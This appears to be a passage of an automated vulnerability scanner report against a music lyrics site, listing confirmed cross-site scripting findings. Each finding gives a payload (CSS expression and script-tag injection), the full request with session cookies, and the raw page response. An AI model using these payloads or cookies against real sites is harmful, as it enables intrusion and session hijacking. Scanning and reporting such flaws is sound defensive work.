<li><a title="Phil Collins Overview" href="/phil-collins-overview.html" >Overview</a></li>
<li><a title="Phil Collins News" href="/phil-collins-gossip-news.html" >News</a></li>
<li><a title="Phil Collins Awards" href="/phil-collins-awards-featured.html" >Awards</a></li>
<li><a title="Phil Collins Albums" href="/phil-collins-albums-list.html" >Albums</a></li>
<li><a title="Phil Collins Lyrics" href="/phil-collins-lyrics.html" >Lyrics</a></li>
<li><a title="Phil Collins Videos" href="/phil-collins-music-videos.html" >Videos</a></li>
<li><a title="Phil Collins Pictures" href="/phil-collins-pictures.html" >Pictures</a></li>
</ul>
</div>
<div class="module" id="ipod"><script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_160x600;tile=4;sz=160x600;ord=1299460898?"></script></div>
<div class="module"><div id="jqpollwrapper">
<div id="jqpoll">
<div id="jqpollhdr"><h4><span class="icoPoll">&nbsp;</span>Poll</h4></div>
<div id="jqpollbody">
<p>Have you downloaded our iPhone app?</p>
<ul id="pollresults">
<li style="display:none"></li>
<li><input type="radio" name="poll" value="5_18" />Yes! Love It</li><li><input type="radio" name="poll" value="5_..
- /2011-miley-cyrus-plays-lindsay-lohan-on-snl-news.html

/2011-miley-cyrus-plays-lindsay-lohan-on-snl-news.html CONFIRMED

http://www.metrolyrics.com/2011-miley-cyrus-plays-lindsay-lohan-on-snl-news.html?nsextt=%22%20stYle=..

Parameters

Parameter Type Value
nsextt GET " stYle=x:expre/**/ssion(alert(9)) ns="

Request

GET /2011-miley-cyrus-plays-lindsay-lohan-on-snl-news.html?nsextt=%22%20stYle=x:expre/**/ssion(netsparker(9))%20ns=%22 HTTP/1.1
Referer: http://www.metrolyrics.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.metrolyrics.com
Cookie: bblastvisit=1299460445; bbsessionhash=e10cebe70021d6be2f59d8cef6bb329f; bblastactivity=1299460453
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: LiteSpeed
X-Powered-By: PHP/5.3.2
Pragma: private
Content-Type: text/html; charset=utf-8
Content-Encoding:
Content-Length: 10443
Cache-Control: private, max-age=3600
Date: Mon, 07 Mar 2011 01:21:43 GMT
Connection: keep-alive
Vary: Accept-Encoding



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.com/help/api-spec" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="classification" content="music" />
<meta name="description" content="Miley Cyrus plays Lindsay Lohan on SNL News about Miley Cyrus" />
<meta name="keywords" content="Miley Cyrus plays Lindsay Lohan on SNL" />
<meta property="fb:page_id" content="81914997331" />
<title>MILEY CYRUS PLAYS LINDSAY LOHAN ON SNL</title>

<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="search" type="application/opensearchdescription+xml" title="metrolyrics" href="/tools/ff_search_bar.xml" />
<link href="/xml/justreleased.xml" rel="alternate" type="application/rss+xml" title="Recently Released Albums" />
<link href="/xml/futurerelease.xml" rel="alternate" type="application/rss+xml" title="Upcoming Album Releases" />
<link href="/xml/topartists.xml" rel="alternate" type="application/rss+xml" title="Top 20 Artists This Week" />
<link href="/xml/topsongs.xml" rel="alternate" type="application/rss+xml" title="Top 20 Lyrics This Week" />


<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
<script type="text/javascript">
<!--//
//variables
var noEgg = false;
var nav={"activeTab":"news","section":"Miley Cyrus","sectionURL":"miley-cyrus-lyrics.html","title":"Miley Cyrus plays Lindsay Lohan on SNL"},

//Set dev server flag
is_dev = false,
//Analytics vars
_comscore = _comscore || [],
_gaq = _gaq || [];
//end analytics vars
//end variables

//start comscore tag
_comscore.push({ c1: "2", c2: "6036538", c3: "" });

(function() {
var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;
s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";
el.parentNode.insertBefore(s, el);
})();

// Google tracking
_gaq.push(
['_setAccount', 'UA-50802-1'],
['_setCustomVar',1,"User Group ID",1,2],

['_trackPageview']
);


(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();

// End Google tracking

//page specific JS

//End page specific JS
//-->
</script>

<link href="/css/g/artist_v2_sprite.css" rel="stylesheet" type="text/css" media="screen" />

<!--[if IE 6]>
<script type="text/javascript" src="/js/iepngfix_tilebg.js"></script>
<![endif]-->


<script type="text/javascript">
__compete_code = '1980f0cd513fe80da3622c2ebed79163';
(function () {
var s = document.createElement('script'),
e = document.getElementsByTagName('script')[0],
t = document.location.protocol.toLowerCase() === 'https:' ?
'https://c.compete.com/bootstrap/' :
'http://c.compete.com/bootstrap/';
s.src = t + __compete_code + '/bootstrap.js';
s.type = 'text/javascript';
s.async = true;
if (e) { e.parentNode.insertBefore(s, e); }
}());
</script>

<!-- Quantcast Tag -->
<script type="text/javascript">
var _qevents = _qevents || [];

(function() {
var elem = document.createElement('script');
elem.src = (document.location.protocol == "https:" ? "https://secure" : "http://edge") + ".quantserve.com/quant.js";
elem.async = true;
elem.type = "text/javascript";
var scpt = document.getElementsByTagName('script')[0];
scpt.parentNode.insertBefore(elem, scpt);
})();

_qevents.push({
qacct:"p-c4eKHIvvd1eXQ"
});
</script>

<noscript>
<div style="display:none;">
<img src="//pixel.quantserve.com/pixel/p-c4eKHIvvd1eXQ.gif" border="0" height="1" width="1" alt="Quantcast"/>
</div>
</noscript>
<!-- End Quantcast tag -->





</head>


<!--[if IE 6 ]><body class="ie6"><![endif]-->
<!--[if IE 7 ]><body class="ie7"><![endif]-->
<!--[if gt IE 6 ]><body><![endif]-->
<!--[if !IE]><!--><body><!--<![endif]-->
<!-- ClickTale Top part -->
<script type="text/javascript">
var WRInitTime=(new Date()).getTime();
</script>
<!-- ClickTale end of Top part -->



<div id="bg-main">
<!-- Begin comScore Tag -->
<noscript>
<div style="display:none"> <img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036538&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cj=1" alt="scorecard tracking image"/> </div>
</noscript>
<!-- End comScore Tag -->
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_1x1;tile=1;sz=1x1;ord=1299460903?"></script>

<div id="header">

<h1>Miley Cyrus plays Lindsay Lohan on SNL</h1>

<div id="hdr-scroll">
<div id="hdr-scrollmenu">
<script type="text/javascript">var addthis_config = {ui_hover_direction: -1, data_ga_property: 'UA-50802-1', "data_track_clickback":true};</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=metroleap"></script>
<ul>
<li class="first"><img src="http://misc.ml-cdn.com/images/n2/loading_inline.gif" alt="Loading..." /></li>
</ul>
</div>
<div id="hdr-scrollsearch">
<form action="/search.php" method="get">
<input type="text" name="search" onclick="_gaq.push(['_trackEvent', 'Search', 'Header Dropdown Click']);if (this.value == 'Search ...') this.value=''" value="Search ..." onblur="if(this.value == '') this.value='Search ...'" id="hdr-scrollsearchip" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-scrollsearchbtn" />
</form>
</div>
</div>
<div id="headertop">
<div class="headerwrap">
<ul id="navmain">
<li id="hdr-lyrics" class="navprimaryli" data-tabname="lyrics">
<a href="/" class="navprimarya" title="Lyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Lyrics']);"><span></span>Lyrics</a>
<div id="hdr-sub-lyrics" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-artists" class="navprimaryli" data-tabname="artists">
<a href="/top-artists.html" title="Artists" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Artists']);"><span></span>Artists</a>
<div id="hdr-sub-artists" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-soundtracks" class="navprimaryli" data-tabname="soundtracks">
<a href="/soundtracks.html" title="soundtracks" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Soundtracks']);"><span></span>Soundtracks</a>
<div id="hdr-sub-soundtracks" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-news" class="navprimaryli" data-tabname="news">
<a href="/news.html" title="News" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'News']);"><span></span>News</a>
<div id="hdr-sub-news" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-apps" class="navprimaryli" data-tabname="apps">
<a href="/apps.html" title="Apps" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Apps']);"><span></span>Apps</a>
<div id="hdr-sub-apps" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-forum" class="navprimaryli" data-tabname="forum">
<a href="/forum/" title="Forum" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Forum']);"><span></span>Forum</a>
<div id="hdr-sub-forum" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-driver" class="navprimaryli">
<a href="http://itunes.apple.com/us/app/metrolyrics-pro/id370144420?mt=8" target="_blank" rel="nofollow" title="Get our iPhone App" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Driver Click', 'metrolyrics Pro App']);">Contests</a>
</li>
</ul>
<ul id="myml">

<li class="navprimaryli"><a href="/request.php" title="My MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'My MetroLyrics', 'Not logged in']);">My MetroLyrics<span></span></a></li>
<li class="navprimaryli"><div id="fb_login_btn"><fb:login-button size="small" perms="email"></fb:login-button></div><div id="fb-root"></div></li>
<li class="myml-alt myml-altfirst navprimaryli"><a href="/register.php" title="Sign Up for MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Sign Up']);">Sign Up</a></li>
<li class="myml-alt navprimaryli"><a rel="nofollow" id="login_link" class="iframe" href="/login.php" title="Login" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Log In']);">Log In</a></li>

</ul>
</div>
</div>

<div id="headermid">
<div class="headerwrap">

<div id="headerlogo"><a href="/" title="Home">MetroLyrics</a></div>
<div id="headersearch">
<form method="get" action="/search.php">
<input type="hidden" name="category" value="artisttitle" />
<input type="text" name="search" onclick="if (this.value == 'Find Your Lyrics, Artists, Videos, more...') this.value='';_gaq.push(['_trackEvent', 'Search', 'Header Main Click']);" value="Find Your Lyrics, Artists, Videos, more..." onblur="if(this.value == '') this.value='Find Your Lyrics, Artists, Videos, more...'" id="hdr-ipsearch" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-btnsearch" />
</form>
<p id="hdr-browse"></p>
</div>

</div>
</div>

<div id="headerbot">
<div class="headerwrap">

<p id="breadcrumbs">
<a href="/" id="bc-home" title="Home">Home</a> &raquo;
<a href="#" id="bc-tab"></a>
</p>
</div>
</div>

<div id="headerad">
<div id="hdrleaderboard">
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_728x90;tile=2;sz=728x90;ord=1299460903?"></script>
</div>
<div id="hdrsocial">
<div class="addthis_default_style">
<a class="addthis_button_facebook_like" fb:like:layout="box_count" fb:like:width="48" fb:like:height="63" addthis:url="http://www.facebook.com/metrolyrics"></a>
<a class="addthis_button_tweet" tw:count="vertical" addthis:url="http://www.metrolyrics.com"></a>
<a class="addthis_counter"></a>
</div>
</div>
</div>

<div id="headercta"><a href="/register.php" title="Join MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Header', 'Join Community Image']);">Join the MetroLyrics Community Today!</a></div>

</div>

<div id="main">

<div id="LRcolumns">
<div id="left">
<div id="Acolumn">
<div id="navLeft">
<img src="http://artists.ml-cdn.com/profile/922016684MileyCyrusProfile.jpg" alt="Miley Cyrus" width="166" />
<h2><a href="miley-cyrus-overview.html" title="Miley Cyrus Overview">Miley Cyrus</a></h2>
<p class="addtofav">


<a href="request.php?dothis=become_a_fan&amp;artistid=922016684" title="Add to My Favorites">Add to My Favorites</a>

</p>
<ul id="artistnav" title="News-int/miley-cyrus/922016684/0">
<li><a title="Miley Cyrus Overview" href="/miley-cyrus-overview.html" >Overview</a></li>
<li><a title="Miley Cyrus News" href="/miley-cyrus-gossip-news.html" >News</a></li>
<li><a title="Miley Cyrus Awards" href="/miley-cyrus-awards-featured.html" >Awards</a></li>
<li><a title="Miley Cyrus Albums" href="/miley-cyrus-albums-list.html" >Albums</a></li>
<li><a title="Miley Cyrus Lyrics" href="/miley-cyrus-lyrics.html" >Lyrics</a></li>
<li><a title="Miley Cyrus Videos" href="/miley-cyrus-music-videos.html" >Videos</a></li>
<li><a title="Miley Cyrus Pictures" href="/miley-cyrus-pictures.html" >Pictures</a></li>
</ul>
</div>
<div class="module" id="ipod"><script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_160x600;tile=4;sz=160x600;ord=1299460903?"></script></div>
<div class="module"><div id="jqpollwrapper">
<div id="jqpoll">
<div id="jqpollhdr"><h4><span class="icoPoll">&nbsp;</span>Poll</h4></div>
<div id="jqpollbody">
<p>Have you downloaded our iPhone app?</p>
<ul id="pollresults">
<li style="display:none"></li>
<li><input type="radio" name="poll" value="5_18" />Yes! Love It</li><li><input type="radio&qu..
- /2011-rihanna-and-ciara-in-twitter-row-news.html

/2011-rihanna-and-ciara-in-twitter-row-news.html CONFIRMED

http://www.metrolyrics.com/2011-rihanna-and-ciara-in-twitter-row-news.html?nsextt=%22%20stYle=x:expr..

Parameters

Parameter Type Value
nsextt GET " stYle=x:expre/**/ssion(alert(9)) ns="

Request

GET /2011-rihanna-and-ciara-in-twitter-row-news.html?nsextt=%22%20stYle=x:expre/**/ssion(netsparker(9))%20ns=%22 HTTP/1.1
Referer: http://www.metrolyrics.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.metrolyrics.com
Cookie: bblastvisit=1299460445; bbsessionhash=e10cebe70021d6be2f59d8cef6bb329f; bblastactivity=1299460453
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.3.2
Pragma: private
Content-Type: text/html; charset=utf-8
Content-Encoding:
Content-Length: 10873
Cache-Control: private, max-age=3600
Date: Mon, 07 Mar 2011 01:21:44 GMT
Connection: keep-alive
Vary: Accept-Encoding



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.com/help/api-spec" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="classification" content="music" />
<meta name="description" content="Rihanna and Ciara in Twitter row News about Rihanna" />
<meta name="keywords" content="Rihanna and Ciara in Twitter row" />
<meta property="fb:page_id" content="81914997331" />
<title>RIHANNA AND CIARA IN TWITTER ROW</title>

<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="search" type="application/opensearchdescription+xml" title="metrolyrics" href="/tools/ff_search_bar.xml" />
<link href="/xml/justreleased.xml" rel="alternate" type="application/rss+xml" title="Recently Released Albums" />
<link href="/xml/futurerelease.xml" rel="alternate" type="application/rss+xml" title="Upcoming Album Releases" />
<link href="/xml/topartists.xml" rel="alternate" type="application/rss+xml" title="Top 20 Artists This Week" />
<link href="/xml/topsongs.xml" rel="alternate" type="application/rss+xml" title="Top 20 Lyrics This Week" />


<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
<script type="text/javascript">
<!--//
//variables
var noEgg = false;
var nav={"activeTab":"news","section":"Rihanna","sectionURL":"rihanna-lyrics.html","title":"Rihanna and Ciara in Twitter row"},

//Set dev server flag
is_dev = false,
//Analytics vars
_comscore = _comscore || [],
_gaq = _gaq || [];
//end analytics vars
//end variables

//start comscore tag
_comscore.push({ c1: "2", c2: "6036538", c3: "" });

(function() {
var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;
s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";
el.parentNode.insertBefore(s, el);
})();

// Google tracking
_gaq.push(
['_setAccount', 'UA-50802-1'],
['_setCustomVar',1,"User Group ID",1,2],

['_trackPageview']
);


(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();

// End Google tracking

//page specific JS

//End page specific JS
//-->
</script>

<link href="/css/g/artist_v2_sprite.css" rel="stylesheet" type="text/css" media="screen" />

<!--[if IE 6]>
<script type="text/javascript" src="/js/iepngfix_tilebg.js"></script>
<![endif]-->


<script type="text/javascript">
__compete_code = '1980f0cd513fe80da3622c2ebed79163';
(function () {
var s = document.createElement('script'),
e = document.getElementsByTagName('script')[0],
t = document.location.protocol.toLowerCase() === 'https:' ?
'https://c.compete.com/bootstrap/' :
'http://c.compete.com/bootstrap/';
s.src = t + __compete_code + '/bootstrap.js';
s.type = 'text/javascript';
s.async = true;
if (e) { e.parentNode.insertBefore(s, e); }
}());
</script>

<!-- Quantcast Tag -->
<script type="text/javascript">
var _qevents = _qevents || [];

(function() {
var elem = document.createElement('script');
elem.src = (document.location.protocol == "https:" ? "https://secure" : "http://edge") + ".quantserve.com/quant.js";
elem.async = true;
elem.type = "text/javascript";
var scpt = document.getElementsByTagName('script')[0];
scpt.parentNode.insertBefore(elem, scpt);
})();

_qevents.push({
qacct:"p-c4eKHIvvd1eXQ"
});
</script>

<noscript>
<div style="display:none;">
<img src="//pixel.quantserve.com/pixel/p-c4eKHIvvd1eXQ.gif" border="0" height="1" width="1" alt="Quantcast"/>
</div>
</noscript>
<!-- End Quantcast tag -->





</head>


<!--[if IE 6 ]><body class="ie6"><![endif]-->
<!--[if IE 7 ]><body class="ie7"><![endif]-->
<!--[if gt IE 6 ]><body><![endif]-->
<!--[if !IE]><!--><body><!--<![endif]-->
<!-- ClickTale Top part -->
<script type="text/javascript">
var WRInitTime=(new Date()).getTime();
</script>
<!-- ClickTale end of Top part -->



<div id="bg-main">
<!-- Begin comScore Tag -->
<noscript>
<div style="display:none"> <img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036538&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cj=1" alt="scorecard tracking image"/> </div>
</noscript>
<!-- End comScore Tag -->
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_1x1;tile=1;sz=1x1;ord=1299460904?"></script>

<div id="header">

<h1>Rihanna and Ciara in Twitter row</h1>

<div id="hdr-scroll">
<div id="hdr-scrollmenu">
<script type="text/javascript">var addthis_config = {ui_hover_direction: -1, data_ga_property: 'UA-50802-1', "data_track_clickback":true};</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=metroleap"></script>
<ul>
<li class="first"><img src="http://misc.ml-cdn.com/images/n2/loading_inline.gif" alt="Loading..." /></li>
</ul>
</div>
<div id="hdr-scrollsearch">
<form action="/search.php" method="get">
<input type="text" name="search" onclick="_gaq.push(['_trackEvent', 'Search', 'Header Dropdown Click']);if (this.value == 'Search ...') this.value=''" value="Search ..." onblur="if(this.value == '') this.value='Search ...'" id="hdr-scrollsearchip" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-scrollsearchbtn" />
</form>
</div>
</div>
<div id="headertop">
<div class="headerwrap">
<ul id="navmain">
<li id="hdr-lyrics" class="navprimaryli" data-tabname="lyrics">
<a href="/" class="navprimarya" title="Lyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Lyrics']);"><span></span>Lyrics</a>
<div id="hdr-sub-lyrics" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-artists" class="navprimaryli" data-tabname="artists">
<a href="/top-artists.html" title="Artists" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Artists']);"><span></span>Artists</a>
<div id="hdr-sub-artists" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-soundtracks" class="navprimaryli" data-tabname="soundtracks">
<a href="/soundtracks.html" title="soundtracks" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Soundtracks']);"><span></span>Soundtracks</a>
<div id="hdr-sub-soundtracks" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-news" class="navprimaryli" data-tabname="news">
<a href="/news.html" title="News" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'News']);"><span></span>News</a>
<div id="hdr-sub-news" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-apps" class="navprimaryli" data-tabname="apps">
<a href="/apps.html" title="Apps" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Apps']);"><span></span>Apps</a>
<div id="hdr-sub-apps" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-forum" class="navprimaryli" data-tabname="forum">
<a href="/forum/" title="Forum" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Forum']);"><span></span>Forum</a>
<div id="hdr-sub-forum" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-driver" class="navprimaryli">
<a href="http://itunes.apple.com/us/app/metrolyrics-pro/id370144420?mt=8" target="_blank" rel="nofollow" title="Get our iPhone App" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Driver Click', 'metrolyrics Pro App']);">Contests</a>
</li>
</ul>
<ul id="myml">

<li class="navprimaryli"><a href="/request.php" title="My MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'My MetroLyrics', 'Not logged in']);">My MetroLyrics<span></span></a></li>
<li class="navprimaryli"><div id="fb_login_btn"><fb:login-button size="small" perms="email"></fb:login-button></div><div id="fb-root"></div></li>
<li class="myml-alt myml-altfirst navprimaryli"><a href="/register.php" title="Sign Up for MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Sign Up']);">Sign Up</a></li>
<li class="myml-alt navprimaryli"><a rel="nofollow" id="login_link" class="iframe" href="/login.php" title="Login" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Log In']);">Log In</a></li>

</ul>
</div>
</div>

<div id="headermid">
<div class="headerwrap">

<div id="headerlogo"><a href="/" title="Home">MetroLyrics</a></div>
<div id="headersearch">
<form method="get" action="/search.php">
<input type="hidden" name="category" value="artisttitle" />
<input type="text" name="search" onclick="if (this.value == 'Find Your Lyrics, Artists, Videos, more...') this.value='';_gaq.push(['_trackEvent', 'Search', 'Header Main Click']);" value="Find Your Lyrics, Artists, Videos, more..." onblur="if(this.value == '') this.value='Find Your Lyrics, Artists, Videos, more...'" id="hdr-ipsearch" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-btnsearch" />
</form>
<p id="hdr-browse"></p>
</div>

</div>
</div>

<div id="headerbot">
<div class="headerwrap">

<p id="breadcrumbs">
<a href="/" id="bc-home" title="Home">Home</a> &raquo;
<a href="#" id="bc-tab"></a>
</p>
</div>
</div>

<div id="headerad">
<div id="hdrleaderboard">
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_728x90;tile=2;sz=728x90;ord=1299460904?"></script>
</div>
<div id="hdrsocial">
<div class="addthis_default_style">
<a class="addthis_button_facebook_like" fb:like:layout="box_count" fb:like:width="48" fb:like:height="63" addthis:url="http://www.facebook.com/metrolyrics"></a>
<a class="addthis_button_tweet" tw:count="vertical" addthis:url="http://www.metrolyrics.com"></a>
<a class="addthis_counter"></a>
</div>
</div>
</div>

<div id="headercta"><a href="/register.php" title="Join MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Header', 'Join Community Image']);">Join the MetroLyrics Community Today!</a></div>

</div>

<div id="main">

<div id="LRcolumns">
<div id="left">
<div id="Acolumn">
<div id="navLeft">
<img src="http://artists.ml-cdn.com/profile/373707204RihannaProfile.jpg" alt="Rihanna" width="166" />
<h2><a href="rihanna-overview.html" title="Rihanna Overview">Rihanna</a></h2>
<p class="addtofav">


<a href="request.php?dothis=become_a_fan&amp;artistid=373707204" title="Add to My Favorites">Add to My Favorites</a>

</p>
<ul id="artistnav" title="News-int/rihanna/373707204/0">
<li><a title="Rihanna Overview" href="/rihanna-overview.html" >Overview</a></li>
<li><a title="Rihanna News" href="/rihanna-gossip-news.html" >News</a></li>
<li><a title="Rihanna Awards" href="/rihanna-awards-featured.html" >Awards</a></li>
<li><a title="Rihanna Albums" href="/rihanna-albums-list.html" >Albums</a></li>
<li><a title="Rihanna Lyrics" href="/rihanna-lyrics.html" >Lyrics</a></li>
<li><a title="Rihanna Videos" href="/rihanna-music-videos.html" >Videos</a></li>
<li><a title="Rihanna Pictures" href="/rihanna-pictures.html" >Pictures</a></li>
</ul>
</div>
<div class="module" id="ipod"><script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_160x600;tile=4;sz=160x600;ord=1299460904?"></script></div>
<div class="module"><div id="jqpollwrapper">
<div id="jqpoll">
<div id="jqpollhdr"><h4><span class="icoPoll">&nbsp;</span>Poll</h4></div>
<div id="jqpollbody">
<p>Have you downloaded our iPhone app?</p>
<ul id="pollresults">
<li style="display:none"></li>
<li><input type="radio" name="poll" value="5_18" />Yes! Love It</li><li><input type="radio" name="poll" value="5_19" />No! But I will...</li><li><input type="radio" name="poll&quo..
- /2011-kylie-minogue-cries-while-talking-about-cancer-battle-news.html

/2011-kylie-minogue-cries-while-talking-about-cancer-battle-news.html CONFIRMED

http://www.metrolyrics.com/2011-kylie-minogue-cries-while-talking-about-cancer-battle-news.html?'"--..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00078B)</script>

Request

GET /2011-kylie-minogue-cries-while-talking-about-cancer-battle-news.html?'"--></style></script><script>netsparker(0x00078B)</script> HTTP/1.1
Referer: http://www.metrolyrics.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.metrolyrics.com
Cookie: bblastvisit=1299460445; bbsessionhash=e10cebe70021d6be2f59d8cef6bb329f; bblastactivity=1299460453
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: LiteSpeed
X-Powered-By: PHP/5.3.2
Pragma: private
Content-Type: text/html; charset=utf-8
Content-Encoding:
Content-Length: 10591
Cache-Control: private, max-age=3600
Date: Mon, 07 Mar 2011 01:21:44 GMT
Connection: keep-alive
Vary: Accept-Encoding



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.com/help/api-spec" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="classification" content="music" />
<meta name="description" content="Kylie Minogue cries while talking about cancer battle News about Kylie Minogue" />
<meta name="keywords" content="Kylie Minogue cries while talking about cancer battle" />
<meta property="fb:page_id" content="81914997331" />
<title>KYLIE MINOGUE CRIES WHILE TALKING ABOUT CANCER BATTLE</title>

<link rel="icon" href="/favicon.ico" type="image/x-icon" />
